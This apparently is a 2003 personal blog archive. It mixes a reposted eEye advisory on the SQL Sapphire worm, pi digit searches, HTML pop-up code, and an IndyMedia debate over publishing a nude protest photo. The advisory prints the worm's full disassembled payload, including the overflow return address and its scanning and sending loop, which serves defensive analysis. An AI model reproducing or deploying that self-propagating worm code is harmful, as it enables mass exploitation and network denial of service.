The worm that's currently attacking the net is apparently an SQL-bug attack. Here's the CNN story.(Got that via Amish Tech Support, thanks, Larry.) And for the tech types, here's a write-up from the intrusions@incidents.org mailing list that's got a lot of info:
From: Marc Maiffret To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: SQL Sapphire Worm Analysis
Date: 25 Jan 2003 04:32:55 -0800
SQL Sapphire Worm Analysis
Release Date:
1/25/03
Severity:
High
Systems Affected:
Microsoft SQL Server 2000 pre SP 2
Description:
Late Friday, January 24, 2003 we became aware of a new SQL worm spreading
quickly across various networks around the world.
The worm is spreading using a buffer overflow to exploit a flaw in Microsoft
SQL Server 2000. The SQL 2000 server flaw was discovered in July, 2002 by
Next Generation Security Software Ltd. The buffer overflow exists because of
the way SQL improperly handles data sent to its Microsoft SQL Monitor port.
Attackers leveraging this vulnerability will be executing their code as
SYSTEM, since Microsoft SQL Server 2000 runs with SYSTEM privileges.
The worm works by generating pseudo-random IP addresses to try to infect
with its payload. The worm payload does not contain any additional
malicious content (in the form of backdoors etc.); however, because of the
nature of the worm and the speed at which it attempts to re-infect systems,
it can potentially create a denial-of-service attack against infected
networks.
We have been able to verify that multiple points of connectivity on the
Internet have been bogged down since 9pm Pacific Standard Time.
It should be noted that this worm is not the same as an earlier SQL worm
that used the SA/nopassword SQL vulnerability as its spread vector. This is
a new worm is more devastating as it is taking advantage of a
software-specific flaw rather than a configuration error. We have already
had many reports of smaller networks brought down due to the flood of data
from the Sapphire Worm trying to re-infect new systems.
Corrective Action
We recommend that people immediately firewall SQL service ports at all of
their gateways. The worm uses only UDP port 1434 (SQL Monitor Port) to
spread itself to a new system; however, it is safe practice to filter all
SQL traffic at all gateways. The following is a list of SQL server ports:
ms-sql-s 1433/tcp #Microsoft-SQL-Server
ms-sql-s 1433/udp #Microsoft-SQL-Server
ms-sql-m 1434/tcp #Microsoft-SQL-Monitor
ms-sql-m 1434/udp #Microsoft-SQL-Monitor
Once again this worm is taking advantage of a known vulnerability that has
had a patch available for many months. Microsoft has also released a recent
service pack for SQL (Service Pack 3) that includes a fix for this
vulnerability.
SQL 2000 Service Pack 3:
http://www.microsoft.com/sql/downloads/2000/sp3.asp
Previous SQL Service Pack versions are vulnerable.
Technical Description
The following is a quick run-down of what the worm's payload is doing after
infection:
1. Retrieves the address of GetProcAddress and Loadlibrary from the IAT in
sqlsort.dll. It snags the necessary library base addresses and function
entry points as needed.
2. Calls gettickcount, and uses returned count as a pseudo-random seed
3. Creates a UDP socket
4. Performs a simple pseudo random number generation formula using the
returned gettickcount value to generate an IP Address that will later be
used as the target.
5. Send worm payload in a SQL Server Resolution Service request to the
pseudo random target address, on port 1434 (UDP).
6. Return back to formula and continue generating new pseudo random
addresses.
push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp
mov eax, 1010101h
; Reconstruct session, after the overflow the payload buffer
; get's corrupted during program execution but before the
; payload is executed. .
xor ecx, ecx
mov cl, 18h
FIXUP:
push eax
loop FIXUP
xor eax, 5010101h
push eax
mov ebp, esp
push ecx
push 6C6C642Eh
push 32336C65h
push 6E72656Bh ; kernel32
push ecx
push 746E756Fh ; GetTickCount
push 436B6369h
push 54746547h
mov cx, 6C6Ch
push ecx
push 642E3233h ; ws2_32.dll
push 5F327377h
mov cx, 7465h
push ecx
push 6B636F73h ; socket
mov cx, 6F74h
push ecx
push 646E6573h ; sendto
mov esi, 42AE1018h ; IAT from sqlsort
lea eax, [ebp-2Ch] ; (ws2_32.dll)
push eax
call dword ptr [esi] ; call loadlibrary
push eax
lea eax, [ebp-20h]
push eax
lea eax, [ebp-10h] ; (kernel32.dll)
push eax
call dword ptr [esi] ; loadlibrary
push eax
mov esi, 42AE1010h ; IAT from sqlsort
mov ebx, [esi]
mov eax, [ebx]
cmp eax, 51EC8B55h ; check entry point fingerprint
jz short VALID_GP
; Check entry point fingerprint for getprocaddress, if it fails
; fall back to GetProcAddress entry in another DLL version.
; Undetermined what dll versions this will succedd on. Due
; to the lack of reliable importing this may not work across all
; dll versions.
mov esi, 42AE101Ch ; IAT entry -> 77EA094C
PRND:
mov eax, [ebp-4Ch] ; Pseudo Random Algorithm Start
lea ecx, [eax+eax*2]
lea edx, [eax+ecx*4]
shl edx, 4
add edx, eax
shl edx, 8
sub edx, eax
lea eax, [eax+edx*4]
add eax, ebx ; Pseudo Random Algorithm End
mov [ebp-4Ch], eax
push 10h
lea eax, [ebp-50h]
push eax
xor ecx, ecx
push ecx
xor cx, 178h
push ecx
lea eax, [ebp+3]
push eax
mov eax, [ebp-54h]
push eax
call esi ; sendto
jmp short PRND ; Jump back to Pseudo Random Algorithm Start
In Closing
We have provided brief information here as we are currently working to
understand more of the worm's internal behavior. We will provide updates as
they become available.
This worm has been dubbed the "Sapphire Worm" by eEye due to the fact that
several engineers had to be pulled away from local bars to begin the
investigation/dissection process.
Credit:
Riley Hassell
Related Links:
SQLSecurity.com
http://sqlsecurity.com/
Microsoft Security Bulletin:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/
bulletin/ms02-039.asp
Copyright (c) 1998-2003 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express consent
of eEye. If you wish to reprint the whole or any part of this alert in any
other medium excluding electronic medium, please e-mail alert@eEye.com for
permission.
Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There are
NO warranties with regard to this information. In no event shall the author
be liable for any damages whatsoever arising out of or in connection with
the use or spread of this information. Any use of this information is at the
user's own risk.
Feedback
Please send suggestions, updates, and comments to:
eEye Digital Security
http://www.eEye.com
info@eEye.com
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
Delivery co-sponsored by TruSecure Corporation
ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo
TICSA - Anniversary Special - Limited Time
Become TICSA certified for just $221.25 US when you register before 3/31/03
with PROMO "TS0103" at www.2test.com. NO membership fees, certification
good for 2 years. Price for international delivery just $296.25 US, with
this offer. Offer cannot be combined with any other special and expires
3/31/03. Visit www.trusecure.com/ticsa for full details.
Oops! I used BlogQuote to post (but not publish) a sequence of lookups in the pi search engine, and then changed the last post to include the others. When I published, it published all the posts, so I got a whole sequence of stuff that was eventually duplicated. Since I don't know how to delete posted entries, I've combined the group in the post that follows and put "error -- removed" in all the others. Anybody who knows how to remove posted entries, please email me and tell me how.
Update:
Found the help button, which told me to use the delete button. Duh... As an old buddy used to say, RYFM(Read Your F*ck*n Fine Manual).
posted by Gary Williams at 3:06 AM
| link |
search string found at binary index = 3379413760
binary pi : 1011110000111000011001011001000000000110110111001001101001101101
binary string: 00111000011001011001
character pi : miotjfsaks.,gary_av,sivr-qpt.dlq,bczh
character string: gary
search string found at binary index = 2506512872
binary pi : 0001111001101001010110000000000000010010010101000100010000011101
binary string: 011010010101100
character pi : nfpmvx,,xhz:p;mel__drthpn:p.xobmthrdp,
character string: mel
search string found at binary index = 2352743612
binary pi : 1101000100001011100111000001000000000011001010000101110110001001
binary string: 00001011100111000001
character pi : mk.;mdodbybaseoa;qanna__yhkvd;dtvxmi.f
character string: anna
search string found at binary index = 753798096
binary pi : 0110010100001101001001100000000000001000010001001111011100010001
binary string: 000011010010011
character pi : bvsi;:_:hcmnm:ceats__bbd;,hr,rnvsg_;_j
character string: ats
search string found at binary index = 1998405976
binary pi : 0010001001100000011001010010110010000101010000011001101000110011
binary string: 0110000001100101001011001
character pi : w_a:b_pjbre-pzpqblarryajashyrxwfz,j:jm
character string: larry
In 1996, NERSC Chief Technologist David H. Bailey, together with Canadian mathematicians Peter Borwein and Simon Plouffe, found a new formula for pi. This formula permits one to calculate the n-th binary or hexadecimal digits of pi, without having to calculate any of the preceding n-1 digits. This formula was discovered by a computer, using Bailey's implementation of Ferguson's PSLQ algorithm. More recently (2001), Bailey and colleague Richard Crandall of Reed College have shown that the existence of this new formula has significant implications for the age-old question: Are the digits of pi random?
<h2 class=myhead>This is 72 point</h2>
<h2 class=myhead36>This is 36 point</h2>
<h2 class=myhead24>This is 24 point</h2>
<h2 class=myhead18>This is 18 point</h2>
The DARPA Grand Challenge Competitors’ Conference will provide background and specific details regarding the anticipated DARPA Grand Challenge contest of fully autonomous ground vehicles. The purpose of this Competitors’ Conference is to announce preliminary details and to provide a forum for potential competitors from various disciplines (sensing, software, mobility, sponsors, etc.) to meet, network, and discuss forming teams.
The conference will be held at the Petersen Automotive Museum at 6060 Wilshire Blvd. (at Fairfax), Los Angeles, CA 90036, from 9:00 AM until 4:00 PM on Saturday, February 22, 2003. The conference room will open at 8:30 AM.
Conference registration and hotel information are available online.
The Grand Challenge is planned as a race in February 2004 from the vicinity of Los Angeles to the vicinity of Las Vegas. The prize for the first vehicle to complete the combination on-and-off-road course within the prescribed time limit is anticipated to be $1,000,000.00. The purpose of the Grand Challenge is to encourage the acceleration of the research, development, and technologies of fully autonomous ground vehicles from non-traditional sources in order to benefit the U.S. military transformation of advanced military capabilities.
A federal court dismissed a lawsuit brought by the American Civil Liberties Union that challenged a display of the Ten Commandments at a Kentucky courthouse.
In the opinion Wednesday, U.S. District Court Judge Karl S. Forester said the display at the Mercer County courthouse "clearly has a legitimate secular purpose of, including but not limited to, acknowledging the historical influence of the Commandments on the development of this country's laws."
The edit of BlogThis worked. The BlogQuote setup program didn't add the <blockquote><i> and endmarks that Phil's site said it would.
So I right-clicked the link bookmarklet, picked properties and changed the JavaScript line. First two tries failed, but I eventually got it to work.
posted by Gary Williams at 4:25 PM
| link |
BlogQuote seems to work, too!
Ok, I got some courage together (the thing apparently does a regedit, if it went wrong I'd have a $2,000 doorstop ), and I ran the BlogQuote setup program. It worked. The item below is posted with the result when I marked a selection on the instructions (thanks, Phil):
That's it. If you feel like coming back here and testing out your new BlogThis by linking to this page in your blog, that would be sweet, but it's not a requirement.
I solved a minor puzzle about pop-up picture sizing
In the example of a picture pop-up (below) the pop-up is the wrong size. I didn't succeed in correctly resizing (partly because my ISP had turned off FTP access because it had been hacked, so I couldn't upload an HTML source file, and partly because I still haven't figured out the out the .document.write() code to write the pop-up HTML directly). Anyways, last night I wrote an HTML file that displays the image correctly. Here it is:
This is the area assigned to the Army's Central Command. To see a larger version of the map, click on it.
Anyway, here's the corrected code (thanks to Mandarin Design):
<div style="width:350px;text-align:left;
padding:5px;background-color:#CCCC99;
border:5px solid black;font-size:12px;padding:10px;">
<A HREF="#"
onClick="docWin=window.open('http://home.corninglink.com/gwms/centralcommandbig.htm',
'myWindow1','resizable,scrollbars=yes,width=841,height=750');
return false;">
<IMG NAME="Map Of Central Command Area" SRC="http://home.corninglink.com/gwms/centralcommandsmall.jpg"
WIDTH=280 HEIGHT=250 alt="central command area"><h3 style="position: relative;top: -200px;font: normal normal normal 30pt Haettenschweiler;color: #FF3300;margin-left: 50px;"><b>Map Of<br> Central Command Area</b></h3></a>This is the area assigned to the Army's Central Command. To see a larger version of the map, click on it.
</div>
Maybe sometime today I'll figure out the window.document.write() code failure. If so, I'll post it. (After all, the TV weather today said we haven't had a day that didn't go below zero since Jan. 10th!)
posted by Gary Williams at 12:53 PM
| link |
Thursday, January 23, 2003
Captain Mandrake was looking for BlogThis, so here it is
Apparently there are hassels with using the JavaScript ap BlogThis with IE6, so I found a writeup on how to do that. It's also got a gadget called BlogQuote which I haven't tried yet. We'll see how this works. Anyway, here's the link:
Install BlogThis
Update: This item was written using the BlogThis JavaScript (from the link bar of my browser, where it sits next to the Weblog.com Ping link that I got thanks to Laurance Simon). It seemed to work fine. I downloaded the BlogQuote installer, but I haven't tried that yet. More to come...
posted by Gary Williams at 8:42 PM
| link |
Cloned cat is because of a dog!
Missy
CC the cloned cat is apparently the result of a project to clone pets, funded by folks who want to clone their dog. Strangely enough, the geneticly identical Cc is a different color and fur pattern than Rainbow, the "genetic mother". (If this keeps up, we're going to need a new vocabulary for genetic relationships, 'eh?) The story is here. The full list of stories (including a cookbook page!) is here.
Final (I think) discussion of Santa Cruz IndyMedia editorial policy
Here are what I expect is the end of the discussion about the editorial policy of Santa Cruz IndyMedia relating to a request to delete a photomontage of pictures taken at a nude anti-war demonstration at a Santa Cruz beach (see earlier stories below).
Douglas Cronyn continues the debate:
Dear indymedia folks,
The previous transmission I intended only to send to Amy and inadvertently sent it to the group in replying. That said, I feel the need to expand a bit on my views on the "pull or not" debate over Amy's picture.
I can hardly disagree more with the intractable stance SC-IMC has evidently decided to take. I am appalled at the shoddy journalism that is being engaged in in defending SC-IMC's position, excepting Bradley's response.
First off, nothing in the press release you and the participants in the event received would lead me to think that in volunteering one's body for this event would lead to a solo shot being posted on the web. The making of a large peace sign was what was called for.
Beyond that, saying that pulling the disputed shot would be "censorship" is an appalling exaggeration. The words that come to mind for me are "discretion, respect, and taste." Does indymedia SC not see how the treatment of this issue engenders mistrust toward you? In thinking of precedents, this would be one to consider. Is building trust in sources not a key point of journalism? It would make me think twice about how much SC-IMC, or at least those involved in putting this piece together, could be trusted for any story secretive in nature that could arise in the future. Going from a purely fear of libel angel, maybe you would just say "oh you didn't say that explicitly would be off the record" or such. I turn to indymedia to rise above this sort of trash, not degrade itself to Enquirer like standards of publishing or not.
Finally, the gender dynamics of the seeminly all male SC-IMC recording and reporting on a mostly female nude picture needs consideration as well. Are you absolutedly insensitive to the potential objectification laying below this type of scenario? If people want to pose in the nude for all to see, great and all power to them, but if not, then this needs to be respected, especially in a collaborative effort like that on Bonny Dune beach between newsmakers and publishers. How far should collaboration go- "take your clothes off and shut up?"
It is unfortuanate that this flap has turned an otherwise beautiful event into some sort of webporn. Is this the standard and community accountability you expect for yourselves, the sort of misrepresentation? I appreciate the time and dedication that you guys and indymedia in general have done, Brad, Aeronius, etc. Hopefully we can all learn from this experience, though the damage is done........
respectfully,
Douglas Cronyn
I immediately replied as follows, since I think Van's photomontage was good newscoverage:
This is a crock, Doug. Describing Van's work as e-porn is offensive and stupid. The montage is not porn, instead is a good picture of what the demo was like if you went. I'm sorry Amy didn't like it, but if you advertise for coverage you have a responsibility to behave in a way that you'll like when you see it published.
In my humble opinion.
--Gary
aaronious comments thoughfully:
fascinating debate.
the most unsettling aspect of the discussion however is the lack of female voices other than amy's. lisa, please chime in if you're out there.
as a journalist, i side with van and ted inasmuch as i feel that censorship should be avoided at all costs regardless of a personal relationship that may exist between reporter/subject.
and because my opinion as a journalist has leverage against my opinion as a sensitive person who doesn't want anyone's feelings to be hurt, my feeling, in the end, is as stated above.
i think it is fair to say that had there been more men at the event, we would have seen more nude shots of men in the collage. yes?
anyway, it's a moot point.
setting a precedent, however, is not. thank you ted, van, for elaborating on this. if we set a precedent in which subjects who have been reported on or photographed can simply request that we remove the photo/article, then we've essentially decided to become discretionary over content based on criteria which we a) have not agreed upon and b) are contrary to the basic tenants of free speech upon which this organization was founded.
thank you all for taking this issue seriously.
-aaronius
Oh, and thank you gary and doug. your recent engagement is much appreciated.
-a
(and aaronius quotes my note, above "this is a crock...")
And Van gives a better summary than I have of the group's point of view and editorial policy
At 05:51 PM 1/22/2003 +0000, Doug Cronyn wrote:
>First off, nothing in the press release you and the participants in the
>event received would lead me to think that in volunteering one's body for
>this event would lead to a solo shot being posted on the web. The making
>of a large peace sign was what was called for.
Take it up with the reporter in the appropriate forum - either private
email, or the public comment threads beneath the articles.
We just provide the means for publication. We're a portal, that's all. We
don't give assignments, we don't pay, we don't apply selection criteria
other than judging under-reportedness and general newsworthiness to Santa
Cruz. The article as published satisfies both. The specific image in
question is only a fragment of the article published, even if it were to
fail either of the above tests.
>The words that come to mind for me are "discretion, respect, and
>taste." Does indymedia SC not see how the treatment of this issue
>engenders mistrust toward you? In thinking of precedents, this would be
>one to consider. Is building trust in sources not a key point of journalism?
See above. SCIMC does not deal with sources, does not edit or verify
reports, does not take ownership of or responsibility for articles
posted. We deal with the audience, and the reporters. Reporters are
responsible for their own reports, and the audience is expected to act like
adults and decide for themselves how much they trust any one report or
reporter.
Likewise, sources must decide for themselves what reporters to trust, how
much, under what conditions.
However, as publishers we also respect people's right to privacy and do not
allow our service to be abused. If someone published a peeping-tom photo
taken from someone's bedroom, we'd remove it.
However, people have no right to privacy in a public place. What do you
think "public" means? It means you share access to it, but you don't
control it - only your own participation.
The "trust" of which you speak, is the same "trust" that the White House
has in CNN not to embarrass them with coverage of certain "activities" of
Washington. The same "trust" that the city council of Santa Cruz have in
the Sentinel to not report the concerns of activists regarding the
Council's regular legislature favoring the business community over the public.
We don't work for you. We don't work for them. Technically, we don't work
for anybody. We are volunteers, serving the audience and the
reporters. No one else.
> It would make me think twice about how much SC-IMC, or at least those
> involved in putting this piece together, could be trusted for any story
> secretive in nature that could arise in the future.
Take it up with the reporter privately, or in the public comment threads.
> Going from a purely fear of libel angel, maybe you would just say "oh
> you didn't say that explicitly would be off the record" or such.
> I turn to indymedia to rise above this sort of trash, not degrade
> itself to Enquirer like standards of publishing or not.
You speculate over something we "might" do, even when what we've actually
done is the opposite, and then you criticize us as if we're guilty of your
speculative action? How slimy is that?
>Finally, the gender dynamics of the seeminly all male SC-IMC recording and
>reporting on a mostly female nude picture needs consideration as
>well. Are you absolutedly insensitive to the potential objectification
>laying below this type of scenario?
Any "potential objectification" is in the eye of the beholder. The SCIMC
is a single-issue activist organization, and that issue is freedom of the
press (and related sub-issues of public empowerment towards that end). We
are NOT a women's liberation group, nor as a group do we wish to be
(individual members may contribute to such causes on their own time, using
their own resources.) We publish news, and if some people only view it
because they want to stare at tits, that's their loss. AND NOT OUR FUCKING
PROBLEM. I think you know where you can shove your Thought Police.
> If people want to pose in the nude for all to see, great and all power
> to them, but if not, then this needs to be respected,
If not, they shouldn't pose nude in public in the first place. Especially
not at a public relations event. Especially if they haven't asked the
photographer for privacy, or attempted to hide from the camera, or cover
themselves. Especially if they've made activist-related poses and gestures
at the camera. Pretty complicated, huh?
>It is unfortuanate that this flap has turned an otherwise beautiful event
>into some sort of webporn.
It is unfortunate that you can only see tits and ass, and not peace
activists. You see only porn, and not news. Ordinarily I pity people like
you, for what you miss out on. But at least they enjoy what little they
see, and everyone's happy.
But you only see these pictures as porn, and you don't even LIKE what you
see, AND you want to blame us for this? That's beyond sad. It's pathetic.
Who's "objectifying" women now? Bloody hell, we're treating them WITH
respect by allowing the reporter to show them naked entirely outside of a
sexual context! We're demonstrating that women's bodies can be worthy of
more than porn - they can be newsworthy, in an entirely unpornographic manner.
If anyone's repressing women's sexuality, it's you with your insistence
that they cannot be looked upon in their natural state WITHOUT it being
pornographic.
Maybe you should stop looking. No one's twisting your arm to visit the
website, you know. It's private property, and you are our guest. If these
pictures upset you, please restrict your browsing to the Sentinel. They'll
keep you safe.
> Is this the standard and community accountability you expect for
> yourselves, the sort of misrepresentation?
What misrepresentation? SHOW ME HOW WE HAVE MISREPRESENTED OURSELVES. Or
did you just make bad assumptions?
> I appreciate the time and dedication that you guys and indymedia in
> general have done, Brad, Aeronius, etc. Hopefully we can all learn from
> this experience, though the damage is done........
Anything damaged by this article, such as people's unwarranted expectations
that we hold their will, rather than the will of the audience, supreme
needs to be destroyed anyway.
We are not your friends - we are media activists. Truth is our first
loyalty, not anyone's Victorian sensibilities. Fairness and accuracy are
our standards, not the maintenance of anyone's public image. This is why
we exist.
Get that through your head - preferably before you cast slander and empty,
vague accusations.
>respectfully,
Bullshit. You don't respect us, or you wouldn't demand that we serve your
Puritanical radical-women's-lib thought-police agenda. You don't
understand the meaning of the word "respect".
/\oO/\ Vangelis <vangelis@qnis.net> - Life is my religion; the world is
my altar.
Tower of High Sorcery, Scott's Valley.
PGP encrypted mail preferred, key ID: 0x475EF91F
Man, tough call, but journalism is a tough profession,
even if you are an amature. I think we can see the
issues involved with journalists getting too friendly
with public figures.
Another issue with the internet is that unlike TV or
print, where a physical retraction would be
impossible, the internet can be altered after the
fact. Whether or not one should do it is another
matter.
The obvious solution would have been for this group to
take it owns photos, bar other photographers, and then
distribute the shots of the group.
I am truely sorry that Van has been put in this
situation, since it was a fluke that he knew the
subject. I also have sympathy for the subject, as she
had no idea that her local public display would become
public in a global media sense. This ties into a class
I'm taking but I won't bore you with the theoretical
implications.
I think we need to add an addendum to the axiom of
"never put anything in an email you don't want to see
printed on the front page of the New York Times or
have to explain to a prosecutor in court." That would
be "never do anything in public that you don't want to
see reproduced and posted all over the internet."
I have to stick to my original post on the issue. I
don't see how we could pull or alter it without a loss
of credibility and setting a dangerous prescedent.
What happens if we pull/alter this picture and then
get another similar request and refuse to pull it? All
they have to do is point to the first incident and
we're toast. Bias, hypocrits, and perhaps liable.
Chalk this up to lessons learned (on both sides).
As a provisonal member, I have no offical vote, but I
have to say I would be opposed to altering the post.
-TED
--- Vangelis <vangelis@qnis.net> wrote:
> Little bit of a follow-up.
>
> At 07:00 PM 1/20/2003 +0000, Amy Courtney wrote:
> >Yes I (we) went to a public beach with media in tow
> to be photographed,
> >but I (we) did it as a group for a group shot for
> the purpose of creating
> >an image of peace. I (we) did not go for the
> purposes of being filmed or
> >photographed up close and alone.
>
> Likewise, I went for the purpose of recording the
> event. The individual
> shots are, in my opinion, an interesting and
> informative part of that
> record for people who would like to have been there
> but could not attend
> (which is the heart of journalism, if you ask me.)
> The pictures only show
> what was in plain sight of anyone who might have
> attended. (As opposed to,
> say, if I was hiding spy cameras in a women's
> bathroom.)
>
> >I (and perhaps others) was (were) under the
> assumption that the same care
> >had been taken in organizing the second event and
> that all journalists
> >present were informed to honor that purpose.
>
> Nope. My only information on the event was this
> announcement:
>
http://santacruz.indymedia.org/front.php3?article_id=2861&group=webcast
>
> And while I stood on the cliff with participants
> walking past me, no one
> said a word like "So you're not going to take
> closeups, right?" In fact
> one woman even requested it (the side shot of the
> woman holding a
> camera.) And another of the people shown is
> actually my friend Catherine
> whom I showed the pics to later at lunch, just for
> fun (she was also my
> ride that morning.) Even though she groaned in
> embarrasment, she made no
> objections.
>
> > It may not be common practice to ask permission
> to use an upclose, solo
> > nude shot, but it does seem to be the respectful
> and courteous thing to
> > do, particularly when dealing with the internet
> where anything posted
> > becomes fair game for anyone and everyone to cut,
> paste, manipulate and
> > repost for their own purposes.
>
> As a rule, I don't ask permission for images
> captured in public space. The
> burden of any such requests should fall on the
> subject.
>
> >2) I was flashing the sign to Van, a friend, not
> Van the journalist
>
> People often tell me things in confidence.
> Traditionally these things are
> prefaced with something like "So, off the record?"
> Alas, no such agreement
> was requested.
>
> >under the assumption that a photo of us playing on
> the beach was neither
> >appropriate nor news worthy, the latter of which he
> seemed to agree with
> >in his tongue and cheek e-mail he sent to me
> entitled "Blackmail"- wherein
> >he wrote that I should not worry, that these
> pictures were not news worthy.
>
> This is entirely true. The email joke was the first
> thing I did with the
> photos, because it was quick and easy. At the time,
> I expected to find no
> journalistic value in the close-ups. Later as I
> reviewed the rest of the
> material I'd shot and compiled the collage, it
> occurred to me that some of
> the closeups were well suited to telling the whole
> story of the
> morning. So I changed my mind on a couple of them,
> though many others were
> still left unused, including I believe some of the
> ones I had sent to
> Amy. I used what I felt was sufficient, without
> crossing into art/porn
> (nudity for nudity's sake).
>
> I could have sent a follow-up email, noting my
> change of plans. I didn't,
> for no particular reason. Just as I sent the
> initial "blackmail" email and
> pics for no particular reason (except idle humor,
> and there was no humor in
> my change of plans).
>
> I admit that I never sought permission, nor intended
> to seek it. A reply
> that happened to indicate discomfort with the photos
> was received, but
> unfortunately not until after I'd already published
> the report. Had I
> received it earlier, I probably would have blurred
> her face out just as a
> favor since her personal identity wasn't really
> significant to the story,
> though with her having become a recent celebrity
> activist I think it an
> interesting detail.
>
> >Again, I am fine with the back side photos being
> posted, it is just the
> >frontal shot that creeps me out a bit.
>
> If either SFIMC or SCIMC would like my permission to
> blur the face out on
> that one pic, or requests a modified version from me
> with that change, I
> will grant either.
>
>
>
> /\oO/\ Vangelis <vangelis@qnis.net> - Life is my
> religion; the world is
> my altar.
> Tower of High Sorcery, Scott's Valley.
> PGP encrypted mail preferred, key ID: 0x475EF91F
An editorial decision by the functional editor (Van does Admin, Joe acts as Editor):
Editorial says: Public figure in a public place. Leave it up.
We can take an official vote of the collective if folks think its needed.
joe
====
[quoted emails snipped]
Here's a hilarious reply to comments from Van:
At 04:29 PM 1/20/2003 -0800, Bradley Allen wrote:
>I'm almost surprised that the photos and the comments on the SC-IMC list
>haven't been reposted on numerous IMCs
>already.
Yeah, no shit. I expected accusations that SCIMC is publishing porn and
exploiting women, by now. Not from Amy, just the radical women's lib
sector in general. Nothing on Global, huh? I'm insulted.
I'm gonna have to work harder, I guess. My personal goal is getting the
SCIMC either sued or picketted by year's end.
B-)
(Dude, just imagine the publicity that would get! You want
"outreach"? There's outreach for ya.)
Somewhere around here I wrote to Van, and later to the list, about how public the list comments were, and could I quote them in my blog. Van, Brad and Ted all replied that the list comments are public, and by all means go ahead and quote.
A neat comment from Ted:
I'm with Van, the more people you piss-off, the better
job you are doing. If we could possibly piss-off
everyone, then we would have made it as a real news
site.
Concerning the blog question, sure, re-post away, and
I appreciate you asking permission, even though this
is technically a public forum. I think this is an
important debate and something every IMC should think
about. We jump on mainstream media for hidden (and not
so hidden bias) or preferential treatment, so we
should look to keep our own house in order. So far, I
think we have a policy on posts that keeps viewpoint
bias out of the editorial process (as opposed to
geographic bias which we are up-front about).
-TED
[quotes snipped]
I haven't asked Doug Croynon for permission, but I assume everybody's seen the commentary about the public status of the list:
Doug Croynon weighs in late:
Amy,
I can understand you wanting to pull the shot. I was under similar impressions as you regarding pictures. On the permission form, I only put Sarah's name on it as far as publishing goes. Looks like they're going to keep it, though, and are intent on pissing folks off, whoever it may be....He could easily have asked you for permission...If it's any consolation, it is a nice picture of you...Is this going to make you hesitant in the future to contact indymedia for stories???
d.
[long quote from previous emails snipped]
I think there's some interesting thought going on here. IndyMedia has the ongoing idea of being an open forum, where anybody can post whatever stories they want and a very loose editorial hand. Here I think it's interesting that apparently there's been very little complaint from their audience (do you think it's because people who don't generally agree with the stories being posted just don't read the site, or what?).
In any case, in my opinion Van and the group have done what I would think is the right thing, reducing the prominence of the controversial picture but keeping the main story prominent, but keeping the controversial picture available. I understand Amy's request that the photo be hidden, but I also think that Van did the right thing: Amy requested the coverage, Van apparently behaved in a normal media fashion (made it obvious what he was doing, used some good taste in the shots he picked, and so on). I think this case does show what happens when people know each other and the friendship relationship gets mixed up with the media relationship (Amy and Van are friends, but Amy's looking for coverage of an issue-demo, while Van's covering the demo). As somebody commented there (Ted, I think), do you want to have politicians complaining because they didn't like what was in a story? Do you automatically give up if they do?
It's an interesting note about the internet: amatuer access to professional problems. Sorta like op-ed blogging, 'eh?
posted by Gary Williams at 10:05 PM
| link |
This is a great email sig from a letter in the Politech mailing list.
posted by Gary Williams at 1:48 PM
| link |
Spam from AOL?
Hello, gwms@corninglink.com After some searching, I found your web site on the Internet.
I used Google and typed in the keyword "Flooring". A very long list of websites came up.
Did you know that if I type in "Flooring", using the Netscape, or Internet Explorer browser I could be immediately sent to YOUR WEBSITE!
I would not get a long list of companies to choose from, I would be connected directly to your website! Our technology can do this for you, It's called keyword ownership.
You have seen keyword ownership before, it's where a company asks you to use their keyword on AOL, then you are directed to their website. This is an application of our technology at work!
If you would you like to explore the possibilities of keyword ownership in our network of 30 million daily U.S. users, please respond with your contact name, website url and best time to reach.
I don't really know if this is from AOL -- I don't send email to spammers, that often just confirms that they've got a valid address. It's almost as good as the Nigerian scam I noted below (Something like Nigerians named Williams?), since it's offering me an ethicly-queasy sell-out search engine position. Everybody's always said AOL sucked, if this is from them I guess they just proved it.
I do wonder why he's talking about "Flooring"; neither here nor in my my homepage stuff is there anything about "flooring". Where do you guess he got my email address from?
Correction: nude protest photomontage not hidden or "pulled"
I was incorrect when I said that Santa Cruz IndyMedia had hidden or "pulled" the nude protest picture photomontage -- as one of the list folks kindly informed me (thanks, Brad) -- I just didn't look far enough down the page.
If you go to this page, you'll see the distance photo I previously said was the replacement, but if you go to the bottom of the page, you'll see this thumbnail of the photomontage:
There's been a good bit of debate on the mailing list lately, which I'll comment on more fully after people give me permission (or not) to quote them. I think I've started a new thread about blogging and whether the email list comments are public!
Update: Van writes to tell me that the email list is publicly archived, so I can reprint what I wish. I think I'll still request permission from folks who haven't said they consider what they've written public (as Van, Brad and Ted have). Certainly I'd be in the same puzzle as what I've been writing about should I quote somebody's email and then they write and ask me to withdraw the quote. More to come!
This is the area assigned to the Army's Central Command. To see a larger version of the map, click on it.
When I tried this in the small version (below), the headline went behind the picture, so I took out the supering effect. On this one, there seems to be a lot of empty space under the picture (probablys the space where the headline would be if it hadn't been supered). I don't know how the fix that (yet).
Anyway, here's the code:
<div style="width:350px;text-align:left;
padding:5px;background-color:#CCCC99;
border:5px solid black;font-size:12px;padding:10px;">
<A HREF="#" onClick="docWindow=
window.open('http://216.136.200.194/auction/Jan/20031206338584484663064.jpg',
'myWindow1','toolbar=no,width=633,
height=583, left=10,top=10 directories=no,
status=yes,scrollbars=no,resizable=no,menubar=no');
docWindow.focus();return false"><IMG NAME="Map Of Central Command Area" SRC="http://216.136.200.194/auction/Jan/20031207760986743716573.jpg"
WIDTH=280 HEIGHT=250 alt="central command area"><h3 style="position: relative;top: -200px;font: normal normal normal 30pt Haettenschweiler;color: #FF3300;margin-left: 50px;"><b>Map Of<br> Central Command Area</b></h3></a>This is the area assigned to the Army's Central Command. To see a larger version of the map, click on it.
</div>
Update: Amazing how things work. I uploaded a larger version of the large map and when I changed the code (in the JavaScript window.open() call,) I accidently left off the closing quote in the name of the jpg file. That caused the code to reload the whole page when you clicked the map image. So then I spent an hour trying to figure out what I'd done. Hey, programming!
posted by Gary Williams at 3:17 PM
| link |
Good thing it's the New Zealand Nature Company.
posted by Gary Williams at 1:04 PM
| link |
Parlimentarians get email nanny
